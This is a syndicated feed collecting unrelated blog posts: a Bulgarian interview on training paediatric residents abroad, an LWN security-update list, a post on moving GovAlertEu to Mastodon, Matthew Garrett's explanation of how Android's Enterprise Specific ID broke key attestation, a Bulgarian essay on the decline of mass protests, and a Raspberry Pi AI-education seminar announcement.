Защо младите ни лекари да се обучават и в чужбина? Разговор с д-р Неда Бакалова

Post Syndicated from Надежда Цекулова original https://www.toest.bg/zashto-mladite-ni-lekari-da-se-obuchavat-i-v-chujbina/

Защо младите ни лекари да се обучават и в чужбина? Разговор с д-р Неда Бакалова

Неда Бакалова е лекарка, специалистка по анестезиология, реанимация и интензивно лечение. Учила е и е специализирала в България, но в последните години работи в болницата в Саутхемптън в Обединеното кралство. Затова в интервюто ще прочетете колко много пъти казва „тук“. Нейното „тук“ е нашето „там“, където има едно по-качествено организирано детско здравеопазване, даващо по-добри резултати.

Защо младите ни лекари да се обучават и в чужбина? Разговор с д-р Неда Бакалова
Д-р Неда Бакалова. Снимка: личен архив

Неда е един от инициаторите на кампанията „Лекари на бъдещето“, която се организира от Фондация BCause и медийната платформа „Майко Мила“. Това е програма за повишаване на нивото на педиатричната помощ в България, ориентирана към лекари специализанти в различни педиатрични специалности. Целта ѝ е да им помогне да натрупат професионален опит в лечебни заведения в чужбина, който да пренесат на местна почва в името на толкова дълго чаканата качествена промяна на българското детско здравеопазване. 

Програмните цели са през 2025 г. да бъдат изпратени петима млади лекари на клинично наблюдение в болници в Европа. Необходимата сума е приблизително 50 000 лв.

Може да дарите на:
Платформата.бг
През benevity – ако сте регистриран служител на компания с профил там.
На номер 17 777 с текст
DMS LEKARI.


Вие сте млада лекарка, която вече се е установила в чужбина. Защо се интересувате от обучението на колегите си, които практикуват в България? 

Да, аз съм анестезиолог по специалност. От три години работя в кардиореанимацията и кардиохирургията в болницата в Саутхемптън. Преди това в България съм била основно в болница „Света Екатерина“. След пристигането си тук за първи път започнах да се занимавам с детска кардиохирургия. Екипът доста ме подкрепи и продължава да ме подкрепя и обучава. Вече давам упойки на деца в детската кардиохирургия, докато паралелно работя в реанимацията за възрастни и наблюдавам работата на колегите в детската реанимация.

Самата програма „Лекари на бъдещето“ започна с една лична история. Може би не е моя работа да я разказвам, но в общи линии, детенцето на инициаторката, което, за съжаление, миналата година почина, прекара последните си 5–6 месеца в Педиатрията [СБАЛ по детски болести „Проф. Иван Митев“ – б.р.]. Чувахме се често и се налагаше да обяснявам неща, които не ѝ бяха обяснени. И оттам се зароди идеята, че би било хубаво специализантите по педиатрия да придобият някакъв опит извън България, да видят, че медицината може да се прави и по друг начин. 

Аз съм била специализант в България и е много тежко.

И всъщност основната идея на тази програма е да се покаже на младите лекари, че не всичко опира до това колко пари или колко ресурси има в системата. Голяма част е организация, мислене.

Нас не ни учат как да говорим с пациентите, как да им осигурим психологическото пространство да минат през преживяването си. И би било полезно да видят как това се прави от лекарите тук. 

Кое е различното освен количеството ресурси? Малко е трудно, но може ли да опитате да обясните какво означава „друг начин на мислене“ например?

Няма да е лесно, защото това не засяга само лекарите и тяхното отношение към пациентите, то е двустранно и като че ли по-всеобхватно. Аз също си давам сметка, че съм се променила тук. И обществото е друго, и отношенията между хората са по-различни. За съжаление, ние, българите, не се държим много добре един с друг, което се пренася на всички нива – от медик към пациент, от близки към медици.

Освен това в Англия хората са изключително горди със своята обществена здравна система, тъй като е изцяло финансирана и създадена от данъците им. И въпреки че има доста кусури и доста чакане, цялостното отношение към работещите в здравеопазването е позитивно, има доверие, което много улеснява работата. 

В България липсва доверие между пациенти и лекари. Също така няма достатъчно хора в системата, натоварването е огромно. В резултат е много вероятно, като отидеш да говориш с близки и пациенти, да си изнервен, защото си преуморен, а те от своя страна да са подозрителни и да не ти вярват. Как да се срещнете в тези условия? 

Тук разговорът, срещата между лекари и пациенти са стимулирани по всякакъв начин. Има стая за близки, където аз мога да седна и да говорим нормално с хората в дискретна среда колкото време е нужно. В България най-често сте изправени в коридор или пред някаква полуотворена врата, често без да можете да изолирате разговора от външни хора. 

Затова споменах „начин на мислене“, защото не става само с лични усилия от самата мен. Просто системата вижда и третира отношенията лекар–пациент по друг начин. 

В България, освен комуникацията, неглижирани са и дефинирането, и контролът на качеството на медицинската помощ. Обединеното кралство има традиции в създаването на професионални стандарти в медицината. Какво може да научи един млад български лекар за това в една болница като тази в Саутхемптън? 

Тук всичко е доста по-прозрачно, за всичко се води статистика и се правят одити. Тази прозрачност е необходима, за да се видят грешките в системата и да се коригират. Ако ти не проследяваш какво всъщност правиш, не водиш никаква статистика или поне не я показваш, ако никой никога не търси отговорност, то качеството със сигурност е по-лошо. В България като цяло нямаме система за това. Тук, примерно, ако си специализант, трябва всяка година да направиш някакъв малък одит на данни в болницата, в която работиш, по някаква тема, която ти избереш. Хората тук имат традиция да проследяват качеството на собствената си работа. Аз лично не съм виждала да се прави в България. 

Може ли да дадете пример за читателите, които не се занимават с медицина?

Аз се занимавам с кардиохирургия. Ако отидете на сайта на Дружеството на кардиохирурзите [в Обединеното кралство – б.р.], ще откриете данни болница по болница какви пациенти се оперират, каква е смъртността им, какви са усложненията им. В България такова нещо няма. 

Освен това дружествата тук изработват и насоки за клинично поведение. В България би било практично да ползваме европейските, но те също трябва да се преведат и адаптират, което не мисля, че се прави от всички дружества по специалности. 

Крайният резултат от всичко е, че тук е трудно да се види някой, който практикува медицината по много по-различен начин от друг. Тоест има някакво общо ниво и общо разбиране какво е добра практика и какво не е.

Колко време ще прекарат лекарите от програмата в болницата в Саутхемптън и до каква степен ще могат да се запознаят с тези процеси, които описвате?

Ще прекарат между 4 и 6 седмици. Първите специалисти ще видят как се вършат нещата в детската реанимация в болницата в Саутхемптън. Там се работи по съвременни протоколи, и то не само от лекарите, но и от сестрите. Например като предаваш пациент, има чеклист какво се прави – определени стъпки, за да се предотвратят човешки грешки. Човешките грешки са част от това, че сме хора, и съществуват винаги, но те могат да бъдат сведени до минимум, когато нещата са стандартизирани и има някакъв ред. 

Друг полезен според мен опит за колегите ще бъде да видят взаимоотношенията в отделението. Моят опит с отношенията между специалисти и специализанти от България не е особено позитивен. Тук взаимоотношенията са много по-професионални. Няма обвинения, няма повишаване на тон. Като цяло това води до по-безопасна практика, тъй като, ако някъде стане грешка или трябва да се каже нещо притеснително, не се страхуваш да го кажеш. 

От чисто медицинска гледна точка болницата има една интересна дейност – тъй като е регионална болница в Южна Англия, покрива доста голяма зона за транспорт на тежко болни деца в сътрудничество с оксфордската реанимация.

Тук организацията на болниците е горе-долу като в България – съществуват големи многопрофилни болници и малки болници, които са общински. Ако има дете, което е в тежко състояние в по-малък център, това звено се заема със задачата да го премести в големия център. Това всъщност е доста, доста трудна работа. И колегите ще могат да видят как се прави и как се организира. 

Ще могат да участват и в курсове за спешна животоспасяваща помощ* на деца. И не на последно място – ще видят на практика как протича комуникацията в реанимацията както с родители, така и с деца. 

Кога очаквате първите специализанти от България?

Очакваме през февруари да дойде един човек, а по-късно през годината още двама да минат през тази болница. Междувременно аз работя за връзки и с други реанимации. Желанието ни е да могат да се обучават поне по петима души годишно.

Има ли възможност по някакъв начин да се надгради този опит впоследствие? 

Това зависи в голяма степен и от самите лекари, които минават през обучението. В Англия постоянно има обяви за обучения, тук се наричат fellowship. Това е вече работа. Доста чужденци идват по този начин, за да се обучават. Колегите, които са преминали през първоначалния етап като клинични наблюдатели – observership, се ползват с предимство при кандидатстването за позиции за по-сериозни обучения. Освен това, докато са тук, могат да създадат контакти, които да улеснят последващо развитие. Аз лично съм се ангажирала да помагам на колегите в опознаването на стъпките и дори в подготовката на документи при нужда. 

Няколко пъти споменахте „детска реанимация“. Само за реаниматори ли е отворено това обучение, или и за лекари, обучаващи се в други тесни детски специалности?

За момента се опитваме да започнем с това. Партнираме си със Специализираната болница по детски болести в София и знаем със сигурност, че ръководството ѝ е готово да подкрепи лекари, работещи в тяхното интензивно отделение, да се включат в обученията. Извън това със сигурност има нужди, а тук има възможности, но ще ни е необходимо време, за да ги развием.

Може би е важно да обясня, че когато един млад лекар е клиничен наблюдател, той не просто се разхожда из болницата и наблюдава. Тук на тези обучения се гледа много сериозно и екипът се ангажира с обучението на младия лекар, затова няма възможност например в реанимацията по едно и също време да има много колеги със статут на клинични наблюдатели. Отделно в болницата в Саутхемптън често идват наблюдатели от други по-малки лечебни заведения от региона. 

Как ще се финансират „лекарите на бъдещето“? 

Фондация BCause ни подкрепи с организацията на кампанията, вече имаме профили в Платформата.бг и DMS. Необходимо е да се плати такса на болницата, която е над 1000 паунда. Отделно бихме искали да можем да покрием разходите на лекарите за път и престой. 

Просто в България има много малко възможности да видиш, че е добре нещата да се правят системно. Дори някой да прави нещо добре, системата ни има много недомислици и не ни позволява да сме консистентни: един път можем да предоставим добра помощ, следващия път – не. И не зависи само от нас. Затова е хубаво да се види цялостната организация на една система, която дава по-добри резултати. 

* Emergency life support (англ.) – това понятие обикновено се използва за процедури или мерки, предприемани в критични ситуации за поддържане на жизнените функции на пациента, например реанимация, изкуствена вентилация или сърдечен масаж.

Security updates for Thursday

Post Syndicated from jake original https://lwn.net/Articles/1001863/

Security updates have been issued by Debian (libsoup2.4, python-aiohttp, and upx-ucl), Fedora (iaito, python3.11, python3.9, and radare2), Red Hat (ruby, ruby:2.5, and ruby:3.1), Slackware (mozilla-thunderbird), SUSE (govulncheck-vulndb, nodejs18, nodejs20, and socat), and Ubuntu (ofono and python-tornado).

Акаунтите на GovAlertEu са вече основно в Mastodon и Bluesky

Post Syndicated from Боян Юруков original https://yurukov.net/blog/2024/govalerteu-mastodon-bluesky/

Светлината е най-добрият дезинфектант.

Преди малко повече от десет години се замислих, че ми е трудно да следя какво се случва из родните институции и мога да подобря процеса. Затова създадох система, която да изчита по няколко пъти на ден новини, документи, събития и други и да ги публикува в акаунт в Twitter. С времето източниците на информация се увеличиха на 140 от над 31 различни институции, а акаунтите станаха осем.

Проектът се нарича GovAlertEu и до скоро публикуваше съобщения в неофициални акаунти на няколко институции, включително тези на МВР и Министерски съвет. Акаунтът на МВР стана официален на два пъти – за последно при един от редовните кабинети. След това си върнах контрола над него. Този на Министерски съвет все още е официален и имат достъп до него като автоматизацията за публикуване на новини си остава.

Няколко неща се промениха в последната година. Първо, значително увеличеното количество информация, която публикувам за градоустройството в София, Пловдив и Благоевград, както и интереса към данните и визуализациите създаде натоварване на ресурсите, които използвам. Второ, промени в моделът на работа на Twitter/X като мрежа направи почти невъзможна работата на автоматизирани акаунти като моя без да се плаща значителни суми на месец. Суми, които биха били оправдани единствено за големи компании и astroturf бот мрежи, каквито сякаш са единствените останали там.

Още при първите крачки към затваряне на API достъпа до Twitter започнах да гледам мрежи като Mastodon. Тези дни довърших интеграцията и вече е достъпна за използване. Благодаря на @mapto, че ме насочи към подходящ код, който да използвам.

Акаунтите достъпни на новия портал

На адреса m.govalert.eu ще откриете всички акаунти свързани с тази мрежа. Там се публикуват в реално време без ограничения всички новини идващи от институциите. Тази страница е паралелно и портал за ActivityPub протокола, което значи, че може да ги следвате в която и да е Fedi мрежа искате, включително Mastodon. Свързал съм акаунтите пред Fedi Bridge с Bluesky, където съобщенията ще се появяват със забавяне от една до 15 мин.

Линковете към отделните мрежи, включително все още Twitter, ще намерите на самата страница като бутони. В Twitter от началото на годината заради ограниченията ще публикувам единствено препратки към Mastodon с ежедневна статистика колко съобщения са пропуснали следящите там. Като начало това ще се случи за основния акаунт на GovAlertEu, този на МВР и този за градоустройството в София. Този на правителството няма толкова много новини, така че ще остане последен.

Ще забележите, че липсват стари съобщения. В следващата седмица ще генерирам новините поне 4-5 години назад във времето. Искам да развия тази страница като основна за услугата заедно със статистика, индикация кои страници на администрацията са изтрити, изчезнали или променени, както и архивиране на някои от тях. В такива случаи линковете от социалните мрежи ще сочат към архивираната версия.

Също, вижда се, че акаунтът на парламента няма съобщения от известно време. Всъщност, източниците на информация не са 140, а 218 от 47 институции, но една немалка част от тях или са променили сайтовете си значително, или не публикуват вече нужната информация. Предвид смяна на фокуса към градоустройството не съм поддържал тези източници, но с този нов портал ще го направя – един по един ще ги обновя започвайки от страницата на парламента. Тази промяна отваря възможността да разширя значително информацията, която искам да публикувам като до сега въвеждах ограничения заради комуникацията с Twitter.

Моите акаунти в Mastodon и Bluesky ще намерите в линковете под блога ми. Приветствам всякаква обратна връзка и идеи.

The post Акаунтите на GovAlertEu са вече основно в Mastodon и Bluesky first appeared on Блогът на Юруков.

Android privacy improvements break key attestation

Post Syndicated from Matthew Garrett original https://mjg59.dreamwidth.org/70630.html

Sometimes you want to restrict access to something to a specific set of devices – for instance, you might want your corporate VPN to only be reachable from devices owned by your company. You can’t really trust a device that self attests to its identity, for instance by reporting its MAC address or serial number, for a couple of reasons:

  • These aren’t fixed – MAC addresses are trivially reprogrammable, and serial numbers are typically stored in reprogrammable flash at their most protected
  • A malicious device could simply lie about them

If we want a high degree of confidence that the device we’re talking to really is the device it claims to be, we need something that’s much harder to spoof. For devices with a TPM this is the TPM itself. Every TPM has an Endorsement Key (EK) that’s associated with a certificate that chains back to the TPM manufacturer. By verifying that certificate path and having the TPM prove that it’s in posession of the private half of the EK, we know that we’re communicating with a genuine TPM[1].

Android has a broadly equivalent thing called ID Attestation. Android devices can generate a signed attestation that they have certain characteristics and identifiers, and this can be chained back to the manufacturer. Obviously providing signed proof of the device identifier is kind of problematic from a privacy perspective, so the short version[2] is that only apps installed using a corporate account rather than a normal user account are able to do this.

But that’s still not ideal – the device identifiers involved included the IMEI and serial number of the device, and those could potentially be used to correlate devices across privacy boundaries since they’re static[3] identifiers that are the same both inside a corporate work profile and in the normal user profile, and also remains static if you move between different employers and use the same phone[4]. So, since Android 12, ID Attestation includes an “Enterprise Specific ID” or ESID. The ESID is based on a hash of device-specific data plus the enterprise that the corporate work profile is associated with. If a device is enrolled with the same enterprise then this ID will remain static, if it’s enrolled with a different enterprise it’ll change, and it just doesn’t exist outside the work profile at all. The other device identifiers are no longer exposed.

But device ID verification isn’t enough to solve the underlying problem here. When we receive a device ID attestation we know that someone at the far end has posession of a device with that ID, but we don’t know that that device is where the packets are originating. If our VPN simply has an API that asks for an attestation from a trusted device before routing packets, we could pass that on to said trusted device and then simply forward the attestation to the VPN server[5]. We need some way to prove that the the device trying to authenticate is actually that device.

The answer to this is key provenance attestation. If we can prove that an encryption key was generated on a trusted device, and that the private half of that key is stored in hardware and can’t be exported, then using that key to establish a connection proves that we’re actually communicating with a trusted device. TPMs are able to do this using the attestation keys generated in the Credential Activation process, giving us proof that a specific keypair was generated on a TPM that we’ve previously established is trusted.

Android again has an equivalent called Key Attestation. This doesn’t quite work the same way as the TPM process – rather than being tied back to the same unique cryptographic identity, Android key attestation chains back through a separate cryptographic certificate chain but contains a statement about the device identity – including the IMEI and serial number. By comparing those to the values in the device ID attestation we know that the key is associated with a trusted device and we can now establish trust in that key.

“But Matthew”, those of you who’ve been paying close attention may be saying, “Didn’t Android 12 remove the IMEI and serial number from the device ID attestation?” And, well, congratulations, you were apparently paying more attention than Google. The key attestation no longer contains enough information to tie back to the device ID attestation, making it impossible to prove that a hardware-backed key is associated with a specific device ID attestation and its enterprise enrollment.

I don’t think this was any sort of deliberate breakage, and it’s probably more an example of shipping the org chart – my understanding is that device ID attestation and key attestation are implemented by different parts of the Android organisation and the impact of the ESID change (something that appears to be a legitimate improvement in privacy!) on key attestation was probably just not realised. But it’s still a pain.

[1] Those of you paying attention may realise that what we’re doing here is proving the identity of the TPM, not the identity of device it’s associated with. Typically the TPM identity won’t vary over the lifetime of the device, so having a one-time binding of those two identities (such as when a device is initially being provisioned) is sufficient. There’s actually a spec for distributing Platform Certificates that allows device manufacturers to bind these together during manufacturing, but I last worked on those a few years back and don’t know what the current state of the art there is

[2] Android has a bewildering array of different profile mechanisms, some of which are apparently deprecated, and I can never remember how any of this works, so you’re not getting the long version

[3] Nominally, anyway. Cough.

[4] I wholeheartedly encourage people not to put work accounts on their personal phones, but I am a filthy hypocrite here

[5] Obviously if we have the ability to ask for attestation from a trusted device, we have access to a trusted device. Why not simply use the trusted device? The answer there may be that we’ve compromised one and want to do as little as possible on it in order to reduce the probability of triggering any sort of endpoint detection agent, or it may be because we want to run on a device with different security properties than those enforced on the trusted device.

comment count unavailable comments

Защо в България вече няма масови протести?

Post Syndicated from Светла Енчева original https://www.toest.bg/zashto-v-bulgaria-veche-nyama-masovi-protesti/

Защо в България вече няма масови протести?

Ако човек не знае нищо за политиката в България и се поразходи вечер по улиците в центъра на София или големите градове, ще си каже, че всичко ни е наред. Заведенията – пълни, площадите – празни (поне откъм протестиращи), хората – видимо доволни, както се пееше в една песен.

А основания за масови протести има. България е в ситуация на институционален полуразпад. Вече три години и половина няма редовно правителство, което да изкара дори една година, да не говорим за пълен мандат. Повечето от т.нар. регулатори (включително Висшият съдебен съвет) са с изтекли мандати, а институции като омбудсмана са без ръководство. Делян Пеевски е завладял не само ДПС, а и върховете на правосъдната система, както и редица общини в страната. Същевременно не спират хибридните атаки от Русия, чиято цел е промяна на геополитическата ориентация на България.

А какви протести бяха…

След разпадането на тоталитарния режим в края на 1989 г. в България на няколко пъти се провеждаха масови протести. И то без да броим многолюдните митинги от декември 1989 г. до началото на 90-те. Ето няколко примера:

Виденовата зима

От 1995 до февруари 1997 г. управляваше правителство на БСП, а премиер беше Жан Виденов. През този период фалираха петнайсетина банки, а инфлацията, особено от 1996 г. нататък, излезе от контрол. Спестяванията на хората се стопиха. 

Личен спомен: през лятото на тази година бях студентка. Заради обезценяването на парите реших да закрия детския влог, открит навремето от баба ми. Парите, методично внасяни през цялото ми детство, стигнаха да купя сватбен подарък – един дезодорант и една самобръсначка.

В края на 1996 г. и началото на 1997 г. инфлацията прерасна в хиперинфлация. Ако сутринта забравех да купя макарони, привечер те вече струваха двойно. Заплатите станаха по 5–6 щатски долара. Не за ден, а за месец. В самия край на годината Виденов подаде оставка, но правителството му продължи да действа.

Насред тази ситуация започнаха протести, в които се включиха представители на всякакви групи – от студенти до пенсионери. Въпреки студа уличните шествия продължиха през целия януари и в началото на февруари.

Междувременно на 22 януари встъпи в длъжност президентът Петър Стоянов. По протокол той беше длъжен да връчи мандат за съставяне на правителство отново на БСП, които въпреки протестите напираха да съставят нов кабинет. Вместо направо да приеме папката с имената на новите министри, на 4 февруари Стоянов свика Консултативния съвет за национална сигурност, на който убеди вносителите да оттеглят предложението си.

Така протестът спечели. Въведе се валутен борд, който действа и до ден днешен. Проведоха се избори, спечелени с мнозинство от Обединените демократични сили, и в продължение на четири години управляваше кабинетът на Иван Костов.

#ДАНСwithme

През юни 2013 г. беше сложено началото на масовите протести против правителството на Пламен Орешарски. За да се стигне дотам обаче, роля изиграха едни други протести, заради които първият кабинет на Бойко Борисов падна. Това са т.нар. протести срещу монополите, насочени основно срещу високите цени на тока и срещу електроразпределителните дружества. Демонстрациите в десетки български градове прераснаха в политически. В този период варненецът Пламен Горанов се самоуби, като се запали пред сградата на Общината във Варна.

В резултат Борисов подаде оставка. На предсрочните избори ГЕРБ отново спечели, но Борисов отказа да състави правителство. Така мандатът отиде у БСП, която направи коалиционен кабинет с ДПС, подкрепян от „златния пръст“ на „Атака“.

Едно от първите неща, които новоизбраният премиер Пламен Орешарски направи, беше да предложи от парламентарната трибуна Делян Пеевски за ръководител на Държавната агенция за национална сигурност (ДАНС). Парламентът прие предложението и същата вечер – на 14 юни – започнаха протести, които продължиха повече от година, въпреки че Пеевски подаде оставка още на следващия ден. В тях се включиха и представители на ГЕРБ.

Освен с многохилядните шествия и със случаите на полицейско насилие, протестите срещу Орешарски се запомниха и с някои арт пърформанси (например възстановка на картината на Йожен Дьолакроа „Свободата води народа“). Както и с хаштаговете #ДАНСwithme – заигравка с ДАНС и английската дума за танц, и #КОЙ – защото никой не искаше да даде информация кой първоначално е предложил Пеевски за шеф на ДАНС. Заради този хаштаг и досега думата „кой“ се използва като синоним на Делян Пеевски.

С времето протестните шествия оредяха, но така и не изчезнаха. Пламен Орешарски подаде оставка през август 2014 г.

Протестите от 2020 г.

През 2020 г. на власт беше третото правителство на Борисов. Макар ГЕРБ да участваха в протестите от 2013 г., по време на следващите две управления, в които бяха водеща политическа сила, допуснаха ДПС (включително Пеевски) да дърпа конците както на правителството, така и на правосъдната система.

През юни бяха разпространени компромати, свързани с Бойко Борисов – снимки от спалнята му, на които се виждат пачки с пари, златни кюлчета и пистолет, както и запис, в който глас, приличащ на неговия, отправя заплахи. В края на месеца Антикорупционният фонд публикува първата част от журналистическото разследване „Осемте джуджета“.

За да илюстрират размерите на задкулисната власт и да покажат нагледно необходимостта от правосъдна реформа, през юли 2020 г. представители на партия „Да, България“, предвождани от председателя ѝ Христо Иванов, щурмуваха с лодка т.нар. сараи на почетния председател на ДПС Ахмед Доган в Росенец. Акцията извади наяве факта, че плажът около резиденцията на Доган, макар и държавна собственост, се охранява от служители на Националната служба за охрана и е на практика частен.

Комбинацията от тези събития даде тласък на протести, които също не се разминаха без полицейско насилие. Поради пандемията от COVID-19 те не бяха толкова масови, колкото през 2013 г. Но пак поради нея в тях успяха да се включат много български студенти, учещи в чужбина, които се бяха прибрали в родината заради временната отмяна на присъственото обучение.

Важна роля в протестите изигра и държавният глава Румен Радев, особено след като тежковъоръжени представители на прокуратурата демонстративно нахлуха в Президентството. В протестите, наред с „Демократична България“, се включи и проруската „Възраждане“, както и представители на левицата. Третото правителство на Борисов просъществува до април 2021 г.

Кой с кого и срещу кого?

От 2021 г. до днес последваха седем (досега) парламентарни избори и осем правителства, шест от които служебни. Тежко̀ им на бъдещите ученици, които ще четат за тези времена в учебниците по история!

В началото ситуацията изглеждаше ясна: всички срещу ГЕРБ и ДПС. Под „всички“ се разбираха президентът Румен Радев, новосъздадената пропрезидентска партия на Слави Трифонов „Има такъв народ“ (ИТН), БСП, Демократична България и коалицията „Изправи се! Мутри вън!“ (по-късно „Изправи се БГ! Ние идваме!“), предвождана от Мая Манолова. Въпреки че през 2013 г. Манолова, тогава от БСП, беше заявила, че тя е предложила Пеевски за шеф на ДАНС. После се отрече от думите си.

ИТН спечели изборите по-късно същата година, но абсурдните ѝ предложения за кабинет и не по-малко абсурдното поведение на членовете ѝ наведоха на идеята, че партията на Трифонов всъщност не иска да управлява. Междувременно в първото служебно правителство на Стефан Янев бяха изгрели звездите на Кирил Петков и Асен Василев. Те основаха собствен политически проект – „Продължаваме промяната“ (ПП), и спечелиха следващите избори. Петков стана премиер в коалиционно правителство на ПП, ДБ, БСП и ИТН.

В този период Радев беше на върха на популярността си и бе избран за втори мандат с подкрепата и на ПП. Не след дълго обаче президентът се обърна срещу Петков и Василев. Конфликтът между него и ПП се задълбочи, след като избухна войната на Русия срещу Украйна, защото ПП застанаха на страната на Украйна, а Радев е с проруски позиции.

Правителството на Петков падна през август 2022 г., след като ИТН се обърнаха срещу ПП. Последваха два служебни (и проруски) кабинета на Гълъб Донев. Народното събрание се сдоби с три проруски партии – „Възраждане“, „Български възход“ на бившия служебен премиер Стефан Янев и БСП.

Така вече основната опозиция не беше всички срещу ГЕРБ и ДПС, а Европа срещу Русия.

В тази ситуация ГЕРБ отново започнаха да изглеждат „от добрите“ и логично спечелиха следващите избори. И по-следващите. Тогава ПП, вече в коалиция с ДБ, се видяха принудени да участват в общо правителство с ГЕРБ, обявено като ротационно, за да престане Румен Радев да прокарва собствената си политика чрез служебни кабинети. Затова парламентът гласува и промени в Конституцията, важна част от които беше ограничаване на правомощията на президента.

Съвместното управление на ПП–ДБ и ГЕРБ, наречено „сглобка“ от Лена Бориславова от ПП, си имаше висока цена – легитимирането на ДПС. И в частност на Делян Пеевски. Първоначално това стана уж заради необходимото мнозинство за промените в Конституцията. Скоро обаче Пеевски се лепна за „сглобката“ и се изживяваше като официален неин говорител. А за всички проблеми ГЕРБ и ДПС изкарваха виновни ПП–ДБ. Накрая отказаха на мястото на Николай Денков премиер да стане Мария Габриел, за да се извърши ротацията на правителството. И то падна.

Последваха две служебни правителства на Димитър Главчев, чрез които – заради ограничените правомощия на президента – на практика управляват ГЕРБ и ДПС. Тоест най-вече ДПС, което междувременно се разцепи на лагер на Пеевски и лагер на Доган, а Пеевски използва властта си върху правосъдната система, за да овладее партията. Това доведе до силно манипулирани избори и разнообразни форми на натиск да се гласува за Пеевски.

Покрай всички тези събития Румен Радев отново изглежда „от добрите“. И започнаха да се множат проруски партии като „Величие“ (която за 21 гласа не влезе в последния парламент) и МЕЧ на бившия депутат от ИТН Радостин Василев.

Смисъл, заместен от паралелни реалности

Да обобщим. За няколко години вече почти всеки политически субект в България е бил в различни конфигурации както с останалите, така и срещу тях. Това подкопава доверието не само в съществуващите партии и коалиции, но и във функционирането на парламентарната демокрация.

Съответно изглежда, че масовите протести губят смисъл. За какво да се протестира и в какво би се изразило политическото представителство на един протест? Ако се протестира против корупцията и за правосъдна реформа, е много лесно гражданската енергия да бъде присвоена от проруски сили, както вече се е случвало. Ако се протестира в името на европейската ориентация на България, това може да изглежда като легитимация на „най-големите евроатлантици“ ГЕРБ и ДПС.

Междувременно хората непрекъснато биват облъчвани с послания, които изместват общественото внимание от важните проблеми. Дали ще става дума за компроматни войни, дали полиция, съд и прокуратура ще се използват като бухалки за разправа с „непослушните“ (един от последните такива случаи беше искането на имунитета на Кирил Петков), дали ще са популистки промени в законите като тази за забраната на ЛГБТИ „пропагандата“ в училище – все ще се намери какво.

На всичко отгоре, въпреки че в действията му няма нищо демократично, Делян Пеевски се държи като говорител на демократичната общност в България. Обяснявайки например, че „болната демокрация се лекува само с повече демокрация“, а „най-мощният лек за демокрацията“ са изборите. Спорно е дали подобни твърдения могат да легитимират Пеевски като демократ. По-вероятно е да легитимират в очите на избирателите парламентарната демокрация като нещо „пеевско“.

Какво се задава на хоризонта

Докато парламентарната демокрация буксува, животът някак си върви. Вярно, за пореден път се обсъжда държавен бюджет, без някой да поема ясна политическа отговорност за него. Има риск България да загуби много пари от Плана за възстановяване и устойчивост. Но пък доходите растат, страната дори влезе в Шенген и има шансове да се дореди и до еврозоната. Логично е много хора да си мислят: значи може и без парламентарна демокрация.

Слез малко повече от година изтича вторият мандат на Румен Радев, а той е публичната личност с най-висок рейтинг в България. Ако създаде свой политически проект, много вероятно е той да е печеливш. Особено ако проектът се представи като алтернатива на настоящата неработеща политическа система. Така до установяването на някаква форма на авторитарно управление от путински тип има само една крачка.

Неотдавна Конституционният съд на Румъния отмени президентските избори заради данни за намеса на Русия в тях. Оказва се впрочем, че хибридните атаки в Румъния имат връзка с фирми, регистрирани в България. И че тези фирми сеят пропаганда и тук. За разлика от румънските институции обаче, българските не изглежда да забелязват някакъв проблем.

По същия начин службите за сигурност, прокуратурата и останалите отговорни институции не изглежда да проявяват интерес към темата за българите във Великобритания, разкрити като руски агенти. Дори след информацията, че те са планирали да убият журналиста Христо Грозев, който беше разкрил кой стои зад опита за убийство на руския опозиционер Алексей Навални.

Държавата си направи оглушки и след журналистическо разследване на „Свободна Европа“, разкриващо, че Русия има нелегално консулство в офиса на БСП във Варна.

Не само на държавата – и на обществото не изглежда да му пука

Като стана дума за БСП, след близо месец блокаж за председател на настоящото 51-во Народно събрание беше избрана конституционалистката Наталия Киселова, депутатка от гражданската квота на листата на партията. Тя е била на специализация в Москва в годината, в която Русия анексира Крим. Преди изборите БСП имаше билбордове с послание „Русия е наш приятел“ – въпреки че самата Русия е обявила България за неприятелска държава.

Избирането на Киселова стана с подкрепата на ПП–ДБ. След известни драми коалицията гласува по този начин, за да изолира проруската „Възраждане“. Никой от ПП–ДБ обаче не попита Киселова каква според нея е причината за войната в Украйна. Или чий е Крим. Като председателка на НС тя е един от хората, които Румен Радев би могъл да избере за служебен премиер, ако отново не се стигне до редовен кабинет.

За разлика от българите, грузинците протестират. Причината за гнева им е решението на проруската партия, спечелила изборите, за отлагане на преговорите за присъединяване към ЕС до 2028 г. Също така протестиращите смятат, че изборите са манипулирани, и оспорват резултатите от тях. До тази ситуация се стига след систематични опити на Русия да придърпа Грузия в своята сфера на влияние.

За разлика от Грузия, България вече е в ЕС. Вероятността обаче в страната да се установи недемократичен проруски режим по подобие на този на Виктор Орбан в Унгария изобщо не е за пренебрегване. Притеснително много знаци сочат към подобен сценарий. Ако той се осъществи, тогава вече може да е късно да протестираме.

How can we teach students about AI and data science? Join our 2025 seminar series to learn more about the topic

Post Syndicated from Jane Waite original https://www.raspberrypi.org/blog/how-can-we-teach-students-about-ai-and-data-science-2025-seminar-series/

AI, machine learning (ML), and data science infuse our daily lives, from the recommendation functionality on music apps to technologies that influence our healthcare, transport, education, defence, and more.

What jobs will be affected by AL, ML, and data science remains to be seen, but it is increasingly clear that students will need to learn something about these topics. There will be new concepts to be taught, new instructional approaches and assessment techniques to be used, new learning activities to be delivered, and we must not neglect the professional development required to help educators master all of this. 

An educator is helping a young learner with a coding task.

As AI and data science are incorporated into school curricula and teaching and learning materials worldwide, we ask: What’s the research basis for these curricula, pedagogy, and resource choices?

In 2024, we showcased researchers who are investigating how AI can be leveraged to support the teaching and learning of programming. But in 2025, we look at what should be taught about AI, ML, and data science in schools and how we should teach this. 

Our 2025 seminar speakers — so far!

We are very excited that we have already secured several key researchers in the field. 

On 21 January, Shuchi Grover will kick off the seminar series by giving an important overview of AI in the K–12 landscape, including developing both AI literacy and AI ethics. Shuchi will provide concrete examples and recently developed frameworks to give educators practical insights on the topic.

Our second session will focus on a teacher professional development (PD) programme to support the introduction of AI in Upper Bavarian schools. Franz Jetzinger from the Technical University of Munich will summarise the PD programme and share how teachers implemented the topic in their classroom, including the difficulties they encountered.

Again from Germany, Lukas Höper from Paderborn University, with Carsten Schulte will describe important research on data awareness and introduce a framework that is likely to be key for learning about data-driven technology. The pair will talk about the Data Awareness Framework and how it has been used to help learners explore, evaluate, and be empowered in looking at the role of data in everyday applications.  

Our April seminar will see David Weintrop from the University of Maryland introduce, with his colleagues, a data science curriculum called API Can Code, aimed at high-school students. The group will highlight the strategies needed for integrating data science learning within students’ lived experiences and fostering authentic engagement.

